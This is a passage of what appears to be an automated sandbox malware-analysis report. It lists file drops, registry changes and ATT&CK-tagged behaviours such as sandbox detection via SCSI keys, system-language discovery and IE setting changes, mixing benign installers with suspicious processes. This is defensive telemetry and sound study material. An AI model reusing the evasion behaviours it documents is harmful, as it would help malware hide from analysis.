File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\VoiceChat\RedSpeakerDark\[email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.146\Locales\as.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Locales\es.pak	setup.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\configs\DateTimeLocaleConfigs\it-it.json	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\MaterialManager\More_Menu.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\fonts\families\Roboto.json	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.146\Trust Protection Lists\Mu\TransparentAdvertisers	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.146\AdSelectionAttestationsPreloaded\manifest.json	setup.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\Controls\PlayStationController\ButtonR1.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\ExtraContent\LuaPackages\Packages\_Index\FoundationImages\FoundationImages\SpriteSheets\img_set_1x_6.png	RobloxPlayerInstaller.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SportsMichigan	22040691
File opened for modification	C:\Windows\lhsp\tv\SET8A17.tmp	tv_enua.exe
File opened for modification	C:\Windows\msagent\SET8EE8.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SET8EF9.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SET8EFA.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET8F1C.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET8F3F.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET8EFB.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentSvr.exe	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET8F2E.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\chars\Bonzi.acs	BonziBuddy432.exe
File opened for modification	C:\Windows\lhsp\help\tv_enua.hlp	tv_enua.exe
File opened for modification	C:\Windows\DirtyBaseline	22040691
File opened for modification	C:\Windows\msagent\SET8EF9.tmp	MSAGENT.EXE
File created	C:\Windows\INF\SET8F2F.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\INF\agtinst.inf	MSAGENT.EXE
File opened for modification	C:\Windows\help\Agt0409.hlp	MSAGENT.EXE
File created	C:\Windows\msagent\SET8F52.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\IncTelevisions	22040691
File opened for modification	C:\Windows\WalkingOpens	c4652134bb.exe
File opened for modification	C:\Windows\msagent\intl\SET8F41.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\lhsp\tv\SET8A16.tmp	tv_enua.exe
File created	C:\Windows\lhsp\tv\SET8A16.tmp	tv_enua.exe
File opened for modification	C:\Windows\lhsp\tv\tvenuax.dll	tv_enua.exe
File opened for modification	C:\Windows\msagent\AgentCtl.dll	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentDPv.dll	MSAGENT.EXE
File opened for modification	C:\Windows\INF\SET8F2F.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\lhsp\help\SET8A47.tmp	tv_enua.exe
File created	C:\Windows\fonts\SET8A48.tmp	tv_enua.exe
File created	C:\Windows\msagent\SET8F0B.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentPsh.dll	MSAGENT.EXE
File opened for modification	C:\Windows\IncTelevisions	22040691
File opened for modification	C:\Windows\msagent\chars\Peedy.acs	BonziBuddy432.exe
File opened for modification	C:\Windows\fonts\andmoipa.ttf	tv_enua.exe
File created	C:\Windows\INF\SET8A58.tmp	tv_enua.exe
File opened for modification	C:\Windows\msagent\SET8F1D.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\intl\SET8F41.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\LionLies	c4652134bb.exe
File opened for modification	C:\Windows\fonts\SET8A48.tmp	tv_enua.exe
File created	C:\Windows\msagent\SET8F2E.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET8F0B.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\SportsMichigan	22040691
File opened for modification	C:\Windows\DirtyBaseline	22040691
File opened for modification	C:\Windows\CarefulIndiana	c4652134bb.exe
File created	C:\Windows\lhsp\help\SET8A47.tmp	tv_enua.exe
File opened for modification	C:\Windows\msagent\SET8EFA.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SET8F1C.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\help\SET8F40.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\intl\Agt0409.dll	MSAGENT.EXE
File created	C:\Windows\lhsp\tv\SET8A17.tmp	tv_enua.exe
File created	C:\Windows\help\SET8F40.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\mslwvtts.dll	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET8F52.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\lhsp\tv\tv_enua.dll	tv_enua.exe
File opened for modification	C:\Windows\msagent\AgentDp2.dll	MSAGENT.EXE
File created	C:\Windows\msagent\SET8EFB.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentMPx.dll	MSAGENT.EXE
File created	C:\Windows\msagent\SET8F1D.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SET8F3F.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgtCtl15.tlb	MSAGENT.EXE
File opened for modification	C:\Windows\INF\tv_enua.inf	tv_enua.exe
File created	C:\Windows\msagent\SET8EE8.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentAnm.dll	MSAGENT.EXE
File opened for modification	C:\Windows\BookmarkVariations	c4652134bb.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2372	4028	WerFault.exe	331
416	5900	WerFault.exe	386

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11025900
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Delta V3.61 b_95073919.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeWebview2Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RobloxPlayerInstaller.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BonziBuddy432.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BonziBDY_4.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11025900
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22040691
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RobloxPlayerInstaller (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	assistant_installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tv_enua.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AgentSvr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	grpconv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NOTEPAD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	grpconv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OperaGX.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RobloxPlayerInstaller (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Delta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RobloxPlayerInstaller (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ContentI3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ide.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSAGENT.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 10 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4788	wget.exe
220	MicrosoftEdgeUpdate.exe
3792	MicrosoftEdgeUpdate.exe
2880	MicrosoftEdgeUpdate.exe
6020	wget.exe
1104	wget.exe
3812	wget.exe
1220	MicrosoftEdgeUpdate.exe
1532	MicrosoftEdgeUpdate.exe
2508	MicrosoftEdgeUpdate.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates system info in registry 2 TTPs 19 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer	RobloxPlayerInstaller.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer	RobloxPlayerInstaller (1).exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	RobloxPlayerInstaller (1).exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer	RobloxPlayerInstaller.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	RobloxPlayerInstaller.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	RobloxPlayerInstaller (1).exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer	RobloxPlayerInstaller (1).exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	RobloxPlayerInstaller.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	RobloxPlayerInstaller (1).exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer	RobloxPlayerInstaller (1).exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies Internet Explorer settings 1 TTPs 44 IoCs

adware spyware

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe"	setup.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player	RobloxPlayerInstaller (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player\WarnOnOpen = "0"	RobloxPlayerInstaller (1).exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\131.0.2903.146\\BHO"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge	setup.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\PROTOCOLEXECUTE\ROBLOX	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player\WarnOnOpen = "0"	RobloxPlayerInstaller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox\WarnOnOpen = "0"	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio\WarnOnOpen = "0"	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox	RobloxPlayerInstaller (1).exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox\WarnOnOpen = "0"	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute	setup.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\PROTOCOLEXECUTE\ROBLOX	RobloxPlayerInstaller (1).exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe"	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox\WarnOnOpen = "0"	RobloxPlayerInstaller (1).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}	setup.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\PROTOCOLEXECUTE\ROBLOX-PLAYER	RobloxPlayerInstaller (1).exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\PROTOCOLEXECUTE\ROBLOX-PLAYER	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player	RobloxPlayerInstaller.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\131.0.2903.146\\BHO"	setup.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player	RobloxPlayerInstaller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player\WarnOnOpen = "0"	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox	RobloxPlayerInstaller.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	MicrosoftEdgeUpdate.exe
